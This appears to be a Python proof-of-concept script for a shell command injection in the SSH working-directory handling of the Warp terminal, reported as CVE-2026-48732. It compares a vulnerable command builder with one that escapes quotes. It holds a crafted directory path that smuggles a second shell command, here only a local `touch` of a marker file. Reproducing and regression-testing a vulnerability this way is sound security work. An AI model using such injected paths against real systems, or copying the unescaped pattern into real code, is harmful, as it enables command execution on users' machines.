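#!/usr/bin/env python3
"""
CVE-2026-48732 Proof of Concept.

This script safely reproduces the vulnerable shell command construction
pattern from Warp's legacy SSH background command path. It runs only against
the local shell and uses a marker file to demonstrate whether command
injection occurred.

Exit status:
    0  the selected mode behaved as expected (vulnerable: marker written,
       fixed: marker left untouched)
    1  the selected mode did not behave as expected
    2  the --marker argument was rejected
"""

from __future__ import annotations

import argparse
import shlex
import subprocess
import sys
import tempfile
from pathlib import Path

# NOTE(review): this is a predictable name in a world-writable directory. On a
# shared host, pass --marker pointing into a directory only you can write to,
# so another local user cannot pre-create or symlink the marker path.
DEFAULT_MARKER = "/tmp/warp_cve_2026_48732_confirmed"


def shell_escape_single_quotes_for_posix(value: str) -> str:
    """Escape embedded single quotes for a surrounding POSIX single-quoted arg.

    Each ``'`` becomes ``'"'"'``: close the quoted run, emit a double-quoted
    single quote, reopen the quoted run. The caller must add the surrounding
    single quotes; the result is not safe in any other quoting context.
    ``shlex.quote`` applies the same replacement and adds the quotes itself.
    """
    return value.replace("'", "'\"'\"'")


def build_vulnerable_command(current_directory_path: str, command: str) -> str:
    """Reproduce the vulnerable command pattern.

        cd '{current_directory_path}' && {command}

    Embedded single quotes are not escaped, so a path containing ``'`` ends
    the quoted argument early and the rest of the path is parsed as shell
    syntax.
    """
    return f"cd '{current_directory_path}' && {command}"


def build_fixed_command(current_directory_path: str, command: str) -> str:
    """Build the same command with the directory path escaped.

    Only ``current_directory_path`` is treated as untrusted. ``command`` is
    interpolated verbatim because it is meant to be shell text supplied by
    the caller.
    """
    # NOTE(review): a path that starts with "-" would still be read by `cd`
    # as an option. `cd -- '...'` closes that gap; it is left out here so the
    # demo changes only the quoting.
    escaped_path = shell_escape_single_quotes_for_posix(current_directory_path)
    return f"cd '{escaped_path}' && {command}"


def remove_marker(marker: Path) -> None:
    """Delete *marker* if present; a missing file is not an error.

    Any other failure (for example a permission error) propagates to the
    caller instead of being hidden.
    """
    try:
        marker.unlink()
    except FileNotFoundError:
        pass


def _marker_mtime_ns(marker: Path) -> int | None:
    """Return the marker's modification time in nanoseconds, or None if absent."""
    try:
        return marker.stat().st_mtime_ns
    except FileNotFoundError:
        return None


def run_shell(command: str) -> subprocess.CompletedProcess[str]:
    """Run *command* through the local ``/bin/sh -c`` and capture its output.

    ``check=False`` is deliberate: a non-zero exit status is part of what the
    demonstration reports, so it must not raise.
    """
    return subprocess.run(
        ["/bin/sh", "-c", command],
        check=False,
        text=True,
        capture_output=True,
    )


def parse_args() -> argparse.Namespace:
    """Parse the command-line options (``--mode``, ``--marker``, ``--keep-existing-marker``)."""
    parser = argparse.ArgumentParser(
        description="Local PoC for CVE-2026-48732 Warp SSH cwd command injection."
    )
    parser.add_argument(
        "--mode",
        choices=("vulnerable", "fixed"),
        default="vulnerable",
        help="Run the vulnerable or fixed command builder.",
    )
    parser.add_argument(
        "--marker",
        default=DEFAULT_MARKER,
        help=f"Marker file created by the payload. Default: {DEFAULT_MARKER}",
    )
    parser.add_argument(
        "--keep-existing-marker",
        action="store_true",
        help="Do not remove an existing marker before running.",
    )
    return parser.parse_args()


def main() -> int:
    """Run the local simulation and return the process exit status.

    Returns 0 when the selected mode behaves as expected, 1 when it does not,
    and 2 when the marker path is not absolute.
    """
    args = parse_args()
    marker = Path(args.marker)

    if not marker.is_absolute():
        print("[-] Marker must be an absolute path.", file=sys.stderr)
        return 2

    if not args.keep_existing_marker:
        remove_marker(marker)

    # Snapshot the marker before the run. With --keep-existing-marker the file
    # may already exist, and a bare existence check afterwards would report an
    # injection that never happened; comparing modification times does not.
    # NOTE(review): on filesystems with coarse timestamps, a marker written
    # moments before this run could go undetected.
    mtime_before = _marker_mtime_ns(marker)
    verb = "created" if mtime_before is None else "updated"

    with tempfile.TemporaryDirectory(prefix="warp-cve-2026-48732-") as safe_dir:
        base_dir = Path(safe_dir)

        # The attacker-controlled cwd closes the single-quoted cd argument,
        # appends a harmless marker creation command, then reopens a quote.
        malicious_cwd = (
            f"{base_dir}'; touch {shlex.quote(str(marker))}; echo '"
        )

        if args.mode == "fixed":
            builder = build_fixed_command
        else:
            builder = build_vulnerable_command
        full_command = builder(malicious_cwd, "pwd")

        print(f"[*] Mode: {args.mode}")
        print("[*] Attacker-controlled remote cwd:")
        print(f" {malicious_cwd}")
        print("[*] Generated helper command:")
        print(f" {full_command}")
        print("[*] Executing generated command locally via /bin/sh...")

        result = run_shell(full_command)

    if result.stdout:
        print("[*] stdout:")
        print(result.stdout.rstrip())
    if result.stderr:
        print("[*] stderr:")
        print(result.stderr.rstrip())
    print(f"[*] Exit code: {result.returncode}")

    mtime_after = _marker_mtime_ns(marker)
    marker_touched = mtime_after is not None and mtime_after != mtime_before

    if args.mode == "fixed":
        # In fixed mode a written marker means the escaping failed, so it must
        # not be reported as success or exit 0. Otherwise this mode cannot
        # serve as a regression check for the mitigation.
        if marker_touched:
            print(f"[-] Failure: {marker} was {verb} in fixed mode.")
            print("[-] Escaping did not prevent the injected shell syntax from executing.")
            return 1
        print(f"[+] OK: {marker} was not {verb}.")
        print("[+] Escaping prevented the injected shell syntax from executing.")
        return 0

    if marker_touched:
        print(f"[!] SUCCESS: {marker} was {verb}.")
        print("[!] Command injection behavior confirmed in the local simulation.")
        return 0

    print(f"[-] Failure: {marker} was not {verb}.")
    return 1


if __name__ == "__main__":
    raise SystemExit(main())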